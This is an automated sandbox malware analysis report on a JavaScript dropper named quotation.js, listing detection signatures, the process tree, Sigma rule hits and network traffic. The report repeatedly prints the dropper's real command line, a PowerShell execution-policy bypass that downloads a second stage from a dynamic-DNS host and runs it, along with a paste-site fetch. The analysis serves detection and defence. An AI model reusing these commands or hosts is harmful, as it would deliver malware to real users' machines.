Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
quotation.js

Overview

General Information

Sample name:quotation.js
Analysis ID:1502676
MD5:e9dfe55aca773878308f2d4d6ad00c79
SHA1:0066ce882b680471050a49ec800d32e47b3765ca
SHA256:d7c6eab85f93123d8bf4db0f5714d2d400d4f7fb93b1a79163ebaee7e72b515d
Tags:js
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
System process connects to network (likely due to code injection or exploit)
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 712 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5428 cmdline: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7756 cmdline: cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7772 cmdline: taskkill /f /im wscript.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Script Initiated Connection to Non-Local Network
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.26.3.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 712, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", ProcessId: 712, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.26.3.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 712, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", ProcessId: 712, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpPAvira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/quotation.vbs.phpAvira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/QuoAvira URL Cloud: Label: malware
Source: http://timmy02.duckdns.orgAvira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C:Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://timmy02.duckdns.org/uploads/186024/QuoVirustotal: Detection: 5%Perma Link
Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: Binary string: \mscorlib.pdb[ source: powershell.exe, 0000000A.00000002.1785333273.00000234C1C51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbviceG source: powershell.exe, 0000000A.00000002.1784746433.00000234C1B8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbon.resources] source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.26.3.16 443Jump to behavior
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: rentry.co
Uses dynamic DNS services
Source: unknownDNS query: name: timmy02.duckdns.org
Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
Source: Joe Sandbox ViewASN Name: ALGTEL-ASDZ ALGTEL-ASDZ
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: GET /6yg2yfkf/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: rentry.co
Source: global trafficHTTP traffic detected: GET /uploads/186024/Quotation.vbs.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: timmy02.duckdns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uploads/186024/Quotation.vbs.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: timmy02.duckdns.orgConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /6yg2yfkf/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: rentry.co
Source: global trafficHTTP traffic detected: GET /uploads/186024/Quotation.vbs.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: timmy02.duckdns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uploads/186024/Quotation.vbs.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: timmy02.duckdns.orgConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: rentry.co
Source: global trafficDNS traffic detected: DNS query: timmy02.duckdns.org
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AA9D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://timmy02.duckdns.org
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AAC98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quo
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766480583.00000234A7CE7000.00000004.00000020.00020000.00000000.sdmp, quotation.js, tempScript.bat.1.drString found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php
Source: powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766381913.00000234A7BF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766329922.00000234A7BD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766480583.00000234A7CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C:
Source: wscript.exe, 00000001.00000002.1794047481.00000274B6A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpP
Source: powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timmy02.duckdns.org/uploads/186024/quotation.vbs.php
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AA2CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
Source: wscript.exe, wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1792296152.00000274B4088000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1792698347.00000274B4365000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1793961218.00000274B6943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/6yg2yfkf/raw
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/6yg2yfkf/raw9
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/6yg2yfkf/rawD6
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co:443/6yg2yfkf/raw
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.7:49702 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "Jump to behavior
Source: quotation.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.troj.expl.evad.winJS@11/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\tempScript.batJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
